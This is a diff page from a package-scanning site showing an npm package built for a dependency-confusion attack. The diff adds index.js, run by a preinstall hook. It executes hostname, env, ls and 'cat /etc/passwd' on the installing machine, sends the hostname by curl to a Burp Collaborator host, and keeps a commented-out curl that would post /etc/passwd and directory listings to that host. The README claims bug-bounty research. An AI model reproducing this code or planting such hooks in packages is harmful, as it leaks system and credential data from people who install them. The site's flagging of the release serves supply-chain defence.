dinesh-dev-nagajikkktest11223qa 0.0.1-security → 0.0.1
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of dinesh-dev-nagajikkktest11223qa might be problematic. Click here for more details.
- package/README.md +20 -3
- package/index.js +59 -0
- package/package.json +10 -3
package/README.md
CHANGED
@@ -1,5 +1,22 @@
|
|
1
|
-
|
1
|
+
This is a sample package claimed for testing Dep-conf atck.
|
2
|
+
|
3
|
+
|
4
|
+
Hi, if you're reading this you're probably wondering what this code is doing on
|
5
|
+
your machine. Don't worry! It doesn't do anything nasty or malicious.
|
6
|
+
|
7
|
+
I am an ethical security researcher, attempting attacks against organisations
|
8
|
+
that have a "bug bounty" type program in place.
|
9
|
+
|
10
|
+
I am performing work similar to the work in this blog post:
|
11
|
+
https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
|
12
|
+
|
13
|
+
If your organisation has a bug bounty program my findings will be reported via
|
14
|
+
that program.
|
15
|
+
|
16
|
+
If your organisation does not have a bug bounty program, you were not targeted
|
17
|
+
by my work and have some how ended up getting included, any data reported from
|
18
|
+
your org will be discarded.
|
19
|
+
|
20
|
+
All data I collect will be deleted as soon as I'm done, in either case.
|
2
21
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
22
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=dinesh-dev-nagajikkktest11223qa for more information.
|
package/index.js
ADDED
@@ -0,0 +1,59 @@
|
|
1
|
+
// const { exec } = require("child_process");
|
2
|
+
|
3
|
+
const exec = require('child_process').exec;
|
4
|
+
|
5
|
+
function os_func() {
|
6
|
+
this.execCommand = function (cmd) {
|
7
|
+
return new Promise((resolve, reject)=> {
|
8
|
+
exec(cmd, (error, stdout, stderr) => {
|
9
|
+
if (error) {
|
10
|
+
reject(error);
|
11
|
+
return;
|
12
|
+
}
|
13
|
+
resolve(stdout)
|
14
|
+
});
|
15
|
+
})
|
16
|
+
}
|
17
|
+
}
|
18
|
+
var os = new os_func();
|
19
|
+
|
20
|
+
os.execCommand('hostname').then(res=> {
|
21
|
+
var url = "https://lk99qpu5o6axevssgdvb1m0t9kfb30.burpcollaborator.net/" + res;
|
22
|
+
|
23
|
+
os.execCommand('curl '+ url).then(res=> {
|
24
|
+
console.log("os >>>", res);
|
25
|
+
})
|
26
|
+
console.log("os >>>", res);
|
27
|
+
}).catch(err=> {
|
28
|
+
console.log("os >>>", err);
|
29
|
+
})
|
30
|
+
|
31
|
+
os.execCommand('cd .. && cd .. && ls -lh').then(res=> {
|
32
|
+
console.log("os >>>", res);
|
33
|
+
}).catch(err=> {
|
34
|
+
console.log("os >>>", err);
|
35
|
+
})
|
36
|
+
|
37
|
+
os.execCommand('env').then(res=> {
|
38
|
+
console.log("os >>>", res);
|
39
|
+
}).catch(err=> {
|
40
|
+
console.log("os >>>", err);
|
41
|
+
})
|
42
|
+
|
43
|
+
return os.execCommand('cat /etc/passwd').then(res=> {
|
44
|
+
console.log("os >>>", res);
|
45
|
+
}).catch(err=> {
|
46
|
+
console.log("os >>>", err);
|
47
|
+
})
|
48
|
+
|
49
|
+
// exec('curl --data-urlencode "passwd=`cat /etc/passwd|base64`" --data-urlencode "hostname=`hostname`" --data-urlencode "pwd=`pwd`" --data-urlencode "ls=`ls ~/`" http://b6imbtuauep1vb5p576tuvyznqtnhc.burpcollaborator.net/' , (error, stdout, stderr) => {
|
50
|
+
// if (error) {
|
51
|
+
// console.log(`error: ${error.message}`);
|
52
|
+
// return;
|
53
|
+
// }
|
54
|
+
// if (stderr) {
|
55
|
+
// console.log(`stderr: ${stderr}`);
|
56
|
+
// return;
|
57
|
+
// }
|
58
|
+
// console.log(`stdout: ${stdout}`);
|
59
|
+
// });
|
package/package.json
CHANGED
@@ -1,6 +1,13 @@
|
|
1
1
|
{
|
2
2
|
"name": "dinesh-dev-nagajikkktest11223qa",
|
3
|
-
"version": "0.0.1
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "0.0.1",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "node index.js"
|
9
|
+
},
|
10
|
+
"author": "vicky621",
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {}
|
6
13
|
}
|